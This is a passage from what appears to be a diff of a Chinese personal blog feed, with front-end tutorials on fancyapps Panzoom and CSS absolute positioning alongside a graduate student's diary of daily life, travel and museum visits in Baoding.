    instance.zoomToCover(event);
    }
    });

    container.addEventListener("mouseleave", () => {
    instance.zoomToFit();
    });

    演示

    吉恩 · 格雷迈恩

    Panzoom-Toolbar

    引入

​从 @fancyapps/ui CDN by jsDelivr - A free, fast, and reliable Open Source CDN 获取 panzoom.toolbar.esm.js 和 panzoom.toolbar.css 并引入。

    使用

    <div class="f-panzoom" id="myPanzoomToolbar" style="background: #ff000020;">
    <img class="f-panzoom__content" src="1088.png" alt="海巨人"/>
    </div>

    <script>
    const options = {
    Toolbar: {
    display: ["zoomIn", "zoomOut", "toggle1to1", "toggleZoom", "panLeft", "panRight", "panUp", "panDown", "rotateCCW", "rotateCW", "flipX", "flipY", "fitX", "fitY", "reset", "toggleFS"],
    },
    };
    new Panzoom(document.getElementById("myPanzoomToolbar"), options, { Toolbar });
    </script>

    ​可以在 Toolbar 下的 display 中设置想要显示的工具栏按钮。
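
​比如只想保留缩放和复位,可以把 display 精简成下面这样(按钮名取自上面的完整列表,构造方式与上面的例子相同):

const simpleOptions = {
  Toolbar: {
    display: ["zoomIn", "zoomOut", "reset"], // 只保留放大、缩小、复位
  },
};
new Panzoom(document.getElementById("myPanzoomToolbar"), simpleOptions, { Toolbar });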

    演示

    海巨人

    Panzoom-Pins

    引入

​从 @fancyapps/ui CDN by jsDelivr - A free, fast, and reliable Open Source CDN 获取 panzoom.pins.esm.js 和 panzoom.pins.css 并引入。

    使用

    <div class="f-panzoom" id="myPanzoomPins">
    <div class="f-panzoom__viewport">
    <div data-panzoom-pin data-x="48.8%" data-y="16.02%">
    <div title="You Are Here">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 0a7.2 7.2 0 0 0-7.27 7.14C4.73 11.08 12 24 12 24s7.27-12.92 7.27-16.86A7.2 7.2 0 0 0 12 0Z"></path></svg>
    </div>
    </div>
    <img class="f-panzoom__content" src="477.png" alt="投火无面者" />
    </div>
    </div>

    <script>
    new Panzoom(document.getElementById("myPanzoomPins"), {
    // Custom options
    }, {
    Pins
    });
    </script>

​用 data-panzoom-pin 给图片打一个 svg 图钉,感觉作用不大……

    data-x="48.8%" data-y="16.02%" 通过测量得到,案例中将坐标点打在投火无面者的火焰上。
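
​这个坐标不用靠目测,可以临时给图片挂一个点击监听,点到哪里就输出哪里的百分比坐标(示意脚本,最好在还没注册 Panzoom 的普通页面上量,量完即可删掉):

const pinImg = document.querySelector("#myPanzoomPins .f-panzoom__content");
pinImg.addEventListener("click", (e) => {
  const rect = pinImg.getBoundingClientRect();
  const x = ((e.clientX - rect.left) / rect.width * 100).toFixed(2);
  const y = ((e.clientY - rect.top) / rect.height * 100).toFixed(2);
  console.log(`data-x="${x}%" data-y="${y}%"`); // 直接复制进 data-panzoom-pin
});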

    演示

    投火无面者

    移植一个牛逼的

    <div class="f-carousel" id="parcelSandbox">
    <div class="f-carousel__slide"><img no-lazy alt="图腾魔像" data-lazy-src="234.png" /></div>
    <div class="f-carousel__slide"><img no-lazy alt="阴燃电鳗" data-lazy-src="223.png" /></div>
    <div class="f-carousel__slide"><img no-lazy alt="投火无面者" data-lazy-src="477.png" /></div>
    <div class="f-carousel__slide"><img no-lazy alt="艾雅 · 黑掌" data-lazy-src="653.png" /></div>
    <div class="f-carousel__slide"><img no-lazy alt="深渊魔物" data-lazy-src="655.png" /></div>
    <div class="f-carousel__slide"><img no-lazy alt="吉恩 · 格雷迈恩" data-lazy-src="665.png" /></div>
    <div class="f-carousel__slide"><img no-lazy alt="海巨人" data-lazy-src="1088.png" /></div>
    </div>

    <style>
    #parcelSandbox {
    height: 450px;
    }
    #parcelSandbox .f-carousel__slide {
    display: flex;
    justify-content: center;
    align-items: center;
    width: clamp(100px, 30vw, 200px);
    height: clamp(100px, 40vw, 300px);
    }
    #parcelSandbox img {
    --x: calc(var(--progress) * 100%);
    --y: calc((var(--progress) + 0.15) * 200%);
    --rot: calc(var(--progress) * 60deg);
    object-fit: cover;
    transform: translate(var(--x), var(--y)) rotate(var(--rot));
    transform-origin: 0% 100%;
    filter: drop-shadow(10px 10px 10px #888);
    }
    </style>

    <script>
    const mapRange = (inputLower, inputUpper, outputLower, outputUpper, value) => {
    const INPUT_RANGE = inputUpper - inputLower;
    const OUTPUT_RANGE = outputUpper - outputLower;
    return (
    outputLower + (((value - inputLower) / INPUT_RANGE) * OUTPUT_RANGE || 0)
    );
    };
    new Carousel(document.getElementById('parcelSandbox'), {
    Dots: false,
    slidesPerPage: 1,
    friction: 0.08,
    on: {
    'refresh Panzoom.beforeTransform': (carousel) => {
    carousel.slides.map((slide) => {
    let slide_progress = carousel.getProgress(slide.index, true);
    slide_progress = mapRange(-1, 1, 1 / 6, -(1 / 6), slide_progress);
    slide.el.style.setProperty('--progress', `${slide_progress}`);
    });
    },
    },
    });
    </script>
    ]]>
    @@ -1284,7 +1284,7 @@ /posts/Diary-20-%E5%80%92%E4%B8%80%EF%BC%81/ - 前言
            

    ​这是一篇姗姗来迟的 Diary……

    ​研二下学期结束了!即将迎来研三生活……

    整个学期

    ​计算得出居然跟上学期待的时间一样久,都是 137 天。

    ​我在这个学期大概洗了 141 次还是 142 次澡😇!

    气温波动图

    ​3 月,曾出现同一时刻福州 30+,保定零下的情况。

    ​4 月至 5 月,虽然当天最高温度福州与保定相当,但是保定在夜间要凉快很多。

    ​6 月的某段时间保定甚至比福州还要热。

    ​但接下来的 7 月就是大福州发威的时候了😬。

    正文

    7.1

    ​实验室里充满了散漫的氛围……似乎已经有了放暑假的感觉。而我还得抓紧时间审改论文😵‍💫。

    7.2

    万达
    万达

    万达广场

    ​琪琪要提桶跑路了,于是宿舍决定吃一顿散伙饭。

    ​打车前往保定的第二家万达。

    牛肉火锅自助
    牛肉火锅自助
    牛肉火锅自助

    ​这家店虽然定价人均¥100 往上,却依然能得到许多同学的推荐。

    ​吃了后觉得确实不错。肉很新鲜,甜品的质量也很好。

    ​里面还有荔枝自助?在北方可是很难吃到荔枝的,嘎嘎炫😋。

    圆滚滚

    ​吃完饭后,凡哥说他的肚子已经大到低头看不见脚了🤪!

    河北 附尸医阝

    ​冀大附院的灯坏了,看上去很不吉利啊😵!

    夜幕降临,你的故事又要结束了

    ​西望万博,云霞红彤彤的,引得大家来拍照。

    鸡水环清

    ​在古城保定,一亩泉又称鸡距泉,府河成就了古城昔日的辉煌。在保定滨河公园有一处壁画,上述“鸡水环清”的字样是这样的:“元代初年张柔在重建清苑郡城时曾作新渠,引鸡距泉(一亩泉)水入城。明代建文年,改保定之土城为砖城时,修筑护城河,引鸡距泉一亩泉水环绕古城。清澈河水与雄伟之保定古城构成鸡水环清胜景。”足见老保定的水色之美。一亩泉也因玫瑰芙蕖,香闻十里,飞鸟游鱼,各自鸣跃的动人景致,博得“小江南”的美名。

    ​大家决定走一走消消食。一路荒凉凉,黑乎乎的都没啥路灯,结果踩到了🐶💩😭。

    7.3

    向日葵
    向日葵

    向日葵

    ​给电瓶车充完电后,看到旁边开了好看的向日葵😍。

    7.4

    ​论文再次投出,这段时间真的觉得挺焦虑的,一直都很早起床😶‍🌫️。

    ​读了个计算机研究生,却要忙于各种文书工作😅。

    7.5

    😭😭😭去北京了
    😭😭😭😭
    投完论文就跑😭😭😭

    ​于是我憋不住了决定再去北京散散心。在去过几次后,觉得去北京还是蛮方便的,比去保定一些交通糟糕的县城景点要便捷得多。

    7.7

    ​其实两天前就收到了退稿意见,这天才看到,说是稿件不在收录范围内😅。

    Thank you for your submission to XXX.

    After carefully evaluating your manuscript submitted to the XXX journal, we are afraid to let you know that your paper cannot be considered for publication in the XXX and we did not send it for a detailed evaluation.

    The main reason for the rejection is that although your manuscript contains some interesting ideas, it has limited contributions related to the aims and scope of the journal. You may want to consider submitting your paper to a different target.

    Sorry that we don’t have good news for you and thank you for your interest in our journal.

    ​好家伙,只得再找一个。真麻烦啊。

    ​后面几天就在继续折腾这破论文了😭。

    7.10

    泛红的叶子

    ​马上就要离开学校了!但好像几个学期下来,在这样的时间点,心情也逐渐变得平静了。

    百日菊
    百日菊
    百日菊

    AI 识别说这是百日菊

    ​去万达买一下明天在车上吃的便当,顺便看看花。

    荷花
    荷花
    荷花
    荷花

    我说这是荷花

    银杏已经有点泛黄了

    ​今年的军训服装是短袖,还蛮好看的。

    准备就绪!

    7.11

    ​爷润了。不知道下学期的生活,将会怎样呢?

    ]]>
    + 前言
            

    ​这是一篇姗姗来迟的 Diary……

    ​研二下学期结束了!即将迎来研三生活……

    整个学期

    ​计算得出居然跟上学期待的时间一样久,都是 137 天。

    ​我在这个学期大概洗了 141 次还是 142 次澡😇!

    气温波动图

    ​3 月,曾出现同一时刻福州 30+,保定零下的情况。

    ​4 月至 5 月,虽然当天最高温度福州与保定相当,但是保定在夜间要凉快很多。

    ​6 月的某段时间保定甚至比福州还要热。

    ​但接下来的 7 月就是大福州发威的时候了😬。

    正文

    7.1

    ​实验室里充满了散漫的氛围……似乎已经有了放暑假的感觉。而我还得抓紧时间审改论文😵‍💫。

    7.2

    万达
    万达

    万达广场

    ​琪琪要提桶跑路了,于是宿舍决定吃一顿散伙饭。

    ​打车前往保定的第二家万达。

    牛肉火锅自助
    牛肉火锅自助
    牛肉火锅自助

    ​这家店虽然定价人均¥100 往上,却依然能得到许多同学的推荐。

    ​吃了后觉得确实不错。肉很新鲜,甜品的质量也很好。

    ​里面还有荔枝自助?在北方可是很难吃到荔枝的,嘎嘎炫😋。

    圆滚滚

    ​吃完饭后,凡哥说他的肚子已经大到低头看不见脚了🤪!

    河北 附尸医阝

    ​冀大附院的灯坏了,看上去很不吉利啊😵!

    夜幕降临,你的故事又要结束了

    ​西望万博,云霞红彤彤的,引得大家来拍照。

    鸡水环清

    ​在古城保定,一亩泉又称鸡距泉,府河成就了古城昔日的辉煌。在保定滨河公园有一处壁画,上述“鸡水环清”的字样是这样的:“元代初年张柔在重建清苑郡城时曾作新渠,引鸡距泉(一亩泉)水入城。明代建文年,改保定之土城为砖城时,修筑护城河,引鸡距泉一亩泉水环绕古城。清澈河水与雄伟之保定古城构成鸡水环清胜景。”足见老保定的水色之美。一亩泉也因玫瑰芙蕖,香闻十里,飞鸟游鱼,各自鸣跃的动人景致,博得“小江南”的美名。

    ​大家决定走一走消消食。一路荒凉凉,黑乎乎的都没啥路灯,结果踩到了🐶💩😭。

    7.3

    向日葵
    向日葵

    向日葵

    ​给电瓶车充完电后,看到旁边开了好看的向日葵😍。

    7.4

    ​论文再次投出,这段时间真的觉得挺焦虑的,一直都很早起床😶‍🌫️。

    ​读了个计算机研究生,却要忙于各种文书工作😅。

    7.5

    😭😭😭去北京了
    😭😭😭😭
    投完论文就跑😭😭😭

    ​于是我憋不住了决定再去北京散散心。在去过几次后,觉得去北京还是蛮方便的,比去保定一些交通糟糕的县城景点要便捷得多。

    7.7

    ​其实两天前就收到了退稿意见,这天才看到,说是稿件不在收录范围内😅。

    Thank you for your submission to XXX.

    After carefully evaluating your manuscript submitted to the XXX journal, we are afraid to let you know that your paper cannot be considered for publication in the XXX and we did not send it for a detailed evaluation.

    The main reason for the rejection is that although your manuscript contains some interesting ideas, it has limited contributions related to the aims and scope of the journal. You may want to consider submitting your paper to a different target.

    Sorry that we don’t have good news for you and thank you for your interest in our journal.

    ​好家伙,只得再找一个。真麻烦啊。

    ​后面几天就在继续折腾这破论文了😭。

    7.10

    泛红的叶子

    ​马上就要离开学校了!但好像几个学期下来,在这样的时间点,心情也逐渐变得平静了。

    百日菊
    百日菊
    百日菊

    AI 识别说这是百日菊

    ​去万达买一下明天在车上吃的便当,顺便看看花。

    荷花
    荷花
    荷花
    荷花

    我说这是荷花

    银杏已经有点泛黄了

    ​今年的军训服装是短袖,还蛮好看的。

    准备就绪!

    7.11

    ​爷润了。不知道下学期的生活,将会怎样呢?

    ]]>
    @@ -1311,7 +1311,7 @@ /posts/CSS-position-absolute/ - .desc { position: absolute; width: 100%; background: #ffffffa0; bottom: 0px; margin: 0 auto; text-align: center; color: #222; }

    参考

    正文

    ​一切复杂的位置布局都可以使用 position: absolute; 来解决!只要提供的数值准确。

    ​下面,我们来使用 position: absolute; 实现一个华容道的布局。

    华容道

    • 画布使用 aspect-ratio: 0.8;,保证宽度始终是高度的 0.8 倍。

• 棋子的位置由 left 和 top 属性控制,锚点在左上角。

    • 棋子的宽度由 width 控制其占父元素宽度的百分比。高度由图片大小决定。

• 华容道的棋盘可视为宽 4、高 5 的棋盘,依此求得各个数值。

    ​最终效果:

    张飞

    张飞

    曹操

    曹操

    马超

    马超

    赵云

    赵云

    关羽

    关羽

    黄忠

    黄忠

    士兵

    士兵

    士兵

    士兵

    士兵

    士兵

    士兵

    士兵

    ​源代码:

    <style>
    .desc {
    position: absolute;
    width: 100%;
    background: #ffffffa0;
    bottom: 0px;
    margin: 0 auto;
    text-align: center;
    color: #222;
    }
    </style>

    <div style="margin: 0 auto; width: 60%; aspect-ratio: 0.8; position: relative; background: #ffdfdf; box-shadow: 4px 4px 5px rgba(0, 0, 0, 0.5);">
    <div style="position: absolute; left: 0%; top: 0%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="张飞" src="ZhangFei.webp"/>
    <p class="desc">张飞</p>
    </div>
    <div style="position: absolute; left: 25%; top: 0%; width: 50%;">
    <img style="margin: 0; max-width: 100%;" alt="曹操" src="CaoCao.webp"/>
    <p class="desc">曹操</p>
    </div>
    <div style="position: absolute; left: 75%; top: 0%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="马超" src="MaChao.webp"/>
    <p class="desc">马超</p>
    </div>
    <div style="position: absolute; left: 0%; top: 40%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="赵云" src="ZhaoYun.webp"/>
    <p class="desc">赵云</p>
    </div>
    <div style="position: absolute; left: 25%; top: 40%; width: 50%;">
    <img style="margin: 0; max-width: 100%;" alt="关羽" src="GuanYu.webp"/>
    <p class="desc">关羽</p>
    </div>
    <div style="position: absolute; left: 75%; top: 40%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="黄忠" src="HuangZhong.webp"/>
    <p class="desc">黄忠</p>
    </div>
    <div style="position: absolute; left: 25%; top: 60%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    <div style="position: absolute; left: 50%; top: 60%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    <div style="position: absolute; left: 0%; top: 80%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    <div style="position: absolute; left: 75%; top: 80%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    </div>

    <div style="margin: -50px 0 0 -80px; width: calc(100% + 160px); height: 80px; background: #00000020;"></div>
    ]]>
    + .desc { position: absolute; width: 100%; background: #ffffffa0; bottom: 0px; margin: 0 auto; text-align: center; color: #222; }

    参考

    正文

    ​一切复杂的位置布局都可以使用 position: absolute; 来解决!只要提供的数值准确。

    ​下面,我们来使用 position: absolute; 实现一个华容道的布局。

    华容道

    • 画布使用 aspect-ratio: 0.8;,保证宽度始终是高度的 0.8 倍。

• 棋子的位置由 left 和 top 属性控制,锚点在左上角。

    • 棋子的宽度由 width 控制其占父元素宽度的百分比。高度由图片大小决定。

• 华容道的棋盘可视为宽 4、高 5 的棋盘,依此求得各个数值(换算示意见下方脚本)。
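
​换算规则很机械:每列占 25% 宽,每行占 20% 高,干脆用一小段脚本生成定位(示意,pieces 里只列了第一行的三个棋子,数据对应文中布局):

// (col, row) 为棋子左上角所在的格子,w 为棋子占的格数(宽)
const pieces = [
  { name: "张飞", col: 0, row: 0, w: 1 },
  { name: "曹操", col: 1, row: 0, w: 2 },
  { name: "马超", col: 3, row: 0, w: 1 },
];
for (const p of pieces) {
  // 棋盘宽 4 格 → 每格 25%;高 5 格 → 每格 20%
  console.log(`${p.name}: left: ${p.col * 25}%; top: ${p.row * 20}%; width: ${p.w * 25}%;`);
}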

    ​最终效果:

    张飞

    张飞

    曹操

    曹操

    马超

    马超

    赵云

    赵云

    关羽

    关羽

    黄忠

    黄忠

    士兵

    士兵

    士兵

    士兵

    士兵

    士兵

    士兵

    士兵

    ​源代码:

    <style>
    .desc {
    position: absolute;
    width: 100%;
    background: #ffffffa0;
    bottom: 0px;
    margin: 0 auto;
    text-align: center;
    color: #222;
    }
    </style>

    <div style="margin: 0 auto; width: 60%; aspect-ratio: 0.8; position: relative; background: #ffdfdf; box-shadow: 4px 4px 5px rgba(0, 0, 0, 0.5);">
    <div style="position: absolute; left: 0%; top: 0%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="张飞" src="ZhangFei.webp"/>
    <p class="desc">张飞</p>
    </div>
    <div style="position: absolute; left: 25%; top: 0%; width: 50%;">
    <img style="margin: 0; max-width: 100%;" alt="曹操" src="CaoCao.webp"/>
    <p class="desc">曹操</p>
    </div>
    <div style="position: absolute; left: 75%; top: 0%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="马超" src="MaChao.webp"/>
    <p class="desc">马超</p>
    </div>
    <div style="position: absolute; left: 0%; top: 40%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="赵云" src="ZhaoYun.webp"/>
    <p class="desc">赵云</p>
    </div>
    <div style="position: absolute; left: 25%; top: 40%; width: 50%;">
    <img style="margin: 0; max-width: 100%;" alt="关羽" src="GuanYu.webp"/>
    <p class="desc">关羽</p>
    </div>
    <div style="position: absolute; left: 75%; top: 40%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="黄忠" src="HuangZhong.webp"/>
    <p class="desc">黄忠</p>
    </div>
    <div style="position: absolute; left: 25%; top: 60%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    <div style="position: absolute; left: 50%; top: 60%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    <div style="position: absolute; left: 0%; top: 80%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    <div style="position: absolute; left: 75%; top: 80%; width: 25%;">
    <img style="margin: 0; max-width: 100%;" alt="士兵" src="ShiBing.webp"/>
    <p class="desc">士兵</p>
    </div>
    </div>

    <div style="margin: -50px 0 0 -80px; width: calc(100% + 160px); height: 80px; background: #00000020;"></div>
    ]]>
    @@ -1446,7 +1446,7 @@ /posts/Diary-19-%E5%80%92%E4%BA%8C%EF%BC%9F/ - 前言

    每日任务

    ​不出意外的话,这将是这个学期倒数第二篇 Diary 了,坚持住!勇士!相信圣光会在最需要你的时候显现🤩🤩🤩!

    正文

    6.17-6.21

    ​整理 6.16 在国博拍的照片中……国博真是太好玩了,我评价为北京最佳😭。为所拍的文物查阅各种资料,从中学习到了不少东西;为了便于更好地在网页上展示我在国博扫的货,还特意设计了一个前端方法,我真是太雅了🤤!

    ​歷史學家卡爾(E. H. Carr,1892~1982 年)曾說:「歷史是歷史家和歷史事實之間不斷交互作用的過程,是現在與過去無止盡的對話。」仔細分析這段話可以發現歷史存在「兩個時間和空間」,一個是歷史事件發生的時空環境,另一個是歷史家所處的時空環境,過去的歷史固然應該以過去的時空條件去解釋、理解其背景和意義,不過也必須注意到歷史家所存在的時間與空間,因為不同的歷史家處於不同的時間、空間,和歷史記錄的對話也將呈現不同的樣貌。

    ​同時,我們也必須有所警覺,長期以來的歷史記錄,以官方史家所撰寫的史書(正史)論述為主,多半以統治者的觀點書寫,因此必須多方蒐集各種史料,更為深入歷史情境,理解不同時代人們所存在的歷史時空環境,包括政治制度、社會規範,以及與外界互動的情形,才能對歷史日常有比較客觀的認識。

    ​挺感谢初中的历史老师,是她让我激发起了对历史的兴趣,让我不至于在国博里像个白痴一样漫无目的地参观。我犹记得她曾经说过的一句话:“这节课虽然中考不考,但是我认为这是一个中学生所应该了解的。”我能感受到她对这门学科真正的理解和热爱,而不是拘泥在教条中。我想,不拘泥于教条,不随人云亦云,拥有独立辩证思考的能力,能够以史为鉴并应用到其他领域中,才是学习历史的最大意义吧🤔。同时,我很鄙视那些德不配位,溜须拍马,见风使舵的“砖家”(不只于历史领域)。

    ​很多华丽的文物背后其实蛮恐怖的。

    ​我翻开历史一查,这历史没有年代,歪歪斜斜的每页上都写着“仁义道德”几个字。我横竖睡不着,仔细看了半夜,才从字缝里看出字来,满本都写着两个字是“吃人”!

    ——鲁迅

    ​同时感觉中国发展不平衡的现象十分明显🫥,这是一个复杂的社会问题。

    ​读研后开始喜欢逛博物馆,到现在也逛了不老少。整理照片的时候还发现曾在不同博物馆里看到了同样的东西,就挺搞笑的。

    6.23 特别篇——要润了再去莲池逛逛吧

    ​这天中午想去市区走走。坐公交去老校区解决一下午饭问题。午饭 Only¥9,真便宜呀真便宜。

    假 · 后母戊鼎

    ​岁逢辛卯。序属深秋,河北大学迎来九十华诞。时逢盛世,学府生辉,古城各界共瞻文化盛典。为感谢多年来河北大学传承文化、培育英才,建设银行保定分行特铸青铜鼎,以铭功铵绩,昭示来兹。其铭曰

    京畿名校,燕赵学府;九十看秋,创业奔流;
    求是先风,驾学诚行;心忧天下,历史使命;
    培育英才,桃李芬芳;银校携手,驰援相助;
    诚纳俊杰,良禽栖木;融资助收,服务师生;
    合作共赢,砥砺前行;奋翮高飞,再创辉煌。

    ​冀大博物馆前面的假 · 后母戊鼎。

    某花

    ​盛夏,又是河北花开放的另一高峰。

    保定军校

    ​保定陆军军官学校始建于 1902 年,前身为北洋陆军行营将弁学堂、陆军速成武备学堂、陆军预备大学堂等。1912 年正式创办保定陆军军官学校,1923 年 8 月停办。前后共培养出 11000 余名学生,仅后来成为将军的就有 1500 余人,被称为“将军的摇篮”。

    ​啊!河北保定!曾经也辉煌过。

    军校广场雕像 军校广场雕像
    军校广场雕像 军校广场雕像 军校广场雕像 军校广场雕像
    军校广场雕像
    将军摇篮简介

​雕塑主体是一位身着戎装骑马驰骋的将军代表,象征着保定军校是诞生将军的摇篮;

​圆柱与雕塑的方形基座组成天圆地方的文化符号,象征着军校学员——胸怀报国理想而驰骋于天地之间的志士;

    ​圆柱体的外形还代表“1”,表示保定军校是中国近代第一所正规化的军事院校;雕塑总高 19.02 米,象征着保定军校始办于 1902 年。基座的台阶为 9 级代表着保定军校共培养了 9 期学员;中心圆柱以环形的浮雕进行装饰,从而构成雕塑整体的有机组成部分。浮雕正面是 5 位军官全身正像,是保定军校所设置的 5 科专业的军人代表,周边的图案则是对步兵、骑兵、工兵、炮兵、辎重兵的形象化描述。

    棋类运动 棋类运动
    棋类运动

    ​无聊地把军校广场上的象棋棋盘复位,结果发现少了仨子😅。

    ​这个围棋不让把棋子拿开我都不知道该怎么下。

    保定军校

    ​啊!保定军校,上承北洋,下开黄埔。因为暑假前特想去广州逛逛,就想再来看看传说中“下开黄埔”的保定军校。

    保定军校纪念馆

​保定军校(1902~1923 年)是自晚清至民国时期,由直隶总督兼北洋大臣袁世凯在保定创办的一系列军事教育机构的统称,是中国军事大变革的重要标志,开创了近代中国正规化军事教育之先河。期间开办了北洋行营将弁学堂、北洋陆军速成武备学堂、陆军部陆军速成学堂、陆军军官学堂(陆军预备大学堂)、陆军军官学校等学校。其中,民国建立后开办的陆军军官学校,是中国近代史上规模最大、设施最完备、学制最正规、门类最齐全的军事学府,自 1912 年开办到 1923 年停办,共办 9 期,设步科、骑科、炮科、工科、辎重科等兵科,经历赵理泰、蒋方震、曲同丰、王汝贤、杨祖德、贾德耀、张鸿绪、孙树林等 8 位校长,毕业学生 6574 人。从 1902 年开办的北洋行营将弁学堂算起,这里共培养出 11000 余名军事领导人才,仅后来成为将军的有 2000 余人,被誉为“将军摇篮”。其中,蒋介石、张群、李济深、陈调元、叶挺、邓演达、赵博生、董振堂、蒋光鼐、陈铭枢、刘文辉、唐生智、张治中、傅作义、顾祝同、黄琪翔、钱大钧、张克侠、何基沣、陶峙岳、陈诚、白崇禧等均为中国近现代史上的风云人物,保定军校也因此蜚声海内外。

    陆军军官学校

    ​恭喜!保定军校从 2 月份检修到现在还不给开😠!

    大慈阁

    大慈阁 大慈阁
    大慈阁

    ​坐公交车前往市中心。

    西大街

    直隶第一街 直隶第一街
    月满西街 · 情定古城 人民照像稻香村 可爱熊熊
    直隶第一街

    ​经过保定政府苦心经营,西大街总算有了些许生气!

    民国风

    ​感觉像上下杭。

    套圈圈

    ​在保定,感觉这种项目特别多。我若去玩,必白送钱。

    老乡你好

    ​我要笑死。

    前面的区域,以后再来探索吧!

    ​前面好像是开什么音乐会,不让进。

    清河道署

    保定水利博物馆

    ​来参观一下之前从未去过的一个小博物馆——清河道署!是清朝直隶时期管理水利的地方。啊!河北保定!曾经也辉煌过。

    保定水利博物馆
    保定水利博物馆 保定水利博物馆 保定水利博物馆 保定水利博物馆 保定水利博物馆
    开冲!

    ​没人,不用预约,不用钱,身份证给保安,爷冲了!

    保定水系

    ​啊!河北保定!拒马河府河白洋淀,都属于海河水系。

    一定要根治海河
    一定要根治海河 一定要根治海河 一定要根治海河 一定要根治海河 一定要根治海河 一定要根治海河
    一定要根治海河

    ​中华人民共和国成立后,毛泽东主席发出了一定要根治海河的号召。自 1958 年开始,海河流域人民按照统一规划、综合治理的方针,从上游到下游,从支流到干流,对海河水系进行了全面根治。上百万治河大军包括中小学生、家庭妇女也挥锨上阵,完成了大大小小一系列整修工程,从根本上对海河进行了治理,终于使海河旧貌换新颜。

    ​海河自天津市区的三岔河口贯穿市区,至大沽口处入海,自古以来就养育了天津人民。海河对天津城市的形成和发展起了举足轻重的作用,但是,在旧时代也给海河流域的人民带来过不少灾难。海河水系支流众多,一到汛期同时涨水,而入海口处却肚大嘴小,宣泄不畅,水流速度越来越慢,泥沙沉积日益严重,排洪能力越来越差,常常形成海河流域的洪涝灾害,给广大人民群众的生活和海河地区社会经济发展造成很大危害。据记载,从 1368 年到 1948 年的 580 年间,海河流域发生过 387 次严重水灾,天津市被淹泡过 70 多次。

    ​河北省地级市天津被水淹了!河北省会保定不能坐视不管😭!

    7.21 暴雨

    ​2012 年 7 月 21 日,河北保定普降特大暴雨,致全市受灾人口 85.3 万人,受灾面积 413 万亩,涉及 11 个县(市)、121 个乡(镇),因灾死亡 31 人、失踪 17 人,紧急转移疏散 15.9 万人,直接经济损失 95.3 亿元。其中,涞源、涞水、易县损失严重。

    ​里面的展馆特别新,我感觉油漆味都没有散干净。

​看样子保定是个很容易闹洪水的地方。展馆里介绍了很多现代对保定治水所取得的成就,大肆邀功🤧。然而河北保定在经历了 2012.7.21 的特大暴雨后,在应对 2023.7.31 的台风中似乎没能做出什么进步。直到现在,保定下一场稍微大一点的雨,学校里都能产生不浅的积水🤬。

    (京爷吉祥😭)

    ​这里说保定是老北京永定河泄洪的一个地方,保定人看了鼻子不得气歪😠。


    ​这里还有一段保定治水史和保定发展史,记录一下。

    保定治水史
    前言

​独特的自然地理、水文水资源条件和区域发展需求,使保定水利具有显著的区域性和时代性。尧统治时,保定所在的冀州开世纪大洪水治理之肇始。春秋战国时期,保定拥有富饶的督亢灌区和相对发达的城市供排水系统。宋辽对峙时期,保定境内的白沟和雄县等地成为两国边界。为抵御辽军南侵,利用保定至渤海间的大清河、易水等河流及沼泽淀泊建成一条水上军事防线——“塘泺防线”。元明清三代定都北京,为保障首都防洪安全,开始大规模修筑潴龙河、永定河、白洋淀等堤防工程体系(京爷吉祥😭)。清雍正年间,怡亲王允祥则在京畿地区大规模营田种稻。近代,保定水利在艰难的环境下仍持续发展。新中国成立后,保定市的水利事业得到前所未有的发展,是历史上水利建设规模最大、效益最显著、成果最辉煌的时期。十八大以来,围绕安全水利、民生水利、资源水利、生态水利、智慧水利和文化水利等六大水利,保定市如火如荼地开展水利建设,掀起历史上又一次建设高潮,并开启“水兴保定”新时代。

    历史建制

​保定水利的发展与建置沿革具有密切的关系。春秋战国时期,燕国和中山国分别在保定以北和以南建都,后赵国灭中山而代之,保定因有“燕南赵北”之称。西汉高祖六年(前 201 年),在今满城置北平县,寓“平定北方”之意。宋建隆元年(960)设保塞军,寓“保卫边塞”之意;太平兴国六年(981),改为保州。元正大四年(1227)张柔重建保州城后,改称顺天路;至元十二年(1275)改为保定路。“保定”之名自此始,寓“保卫大都,安定天下”之意(京爷吉祥😭)。明初置保定府,永乐元年(1403)迁都北京,并将大宁都指挥使司迁驻保定,保定成为“都南屏障”(京爷吉祥😭)。清康熙八年(1669),直隶巡抚驻扎保定,保定成为直隶省会和“冀北干城”。1948 年,保定解放,建保定市。历史时期,保定不同阶段的水利建设具有不同的特征。

    保定古代史
    先秦——燕南赵北

​ 西周初,周武王封召公奭于燕,建都于蓟(今北京西南),今涞水一带属燕地。
    ​ 春秋时期,今保定北部属燕,南部属鲜虞(春秋末年改名中山)。
    ​ 战国时期,今保定北部属燕,南部属中山,赵灭中山后属赵,故有“燕南赵北”之称。燕昭王在今易县建下都。

    秦汉时期——县治分设

    ​ 秦统一中国后,实行郡县制。今保定南部属恒山郡,北部大多属广阳郡,另有广昌县(今涞源县)属代郡。秦代在此置县 7 个,即曲阳、涿县、广昌、范阳(今定兴)、易县(今雄县)、曲逆(今顺平)和庆都(今望都)。汉代实行郡国制,西汉新置县 18 个,东汉新置县 3 个。

魏晋南北朝隋唐五代十国

    ​ 这才发现,唐朝时期的河北几乎没啥历史……其它时段的保定估计老惨了😭,更没空整水利了。

    宋代——保州设立

    ​ 宋建隆元年(960),在清苑县设保塞军。
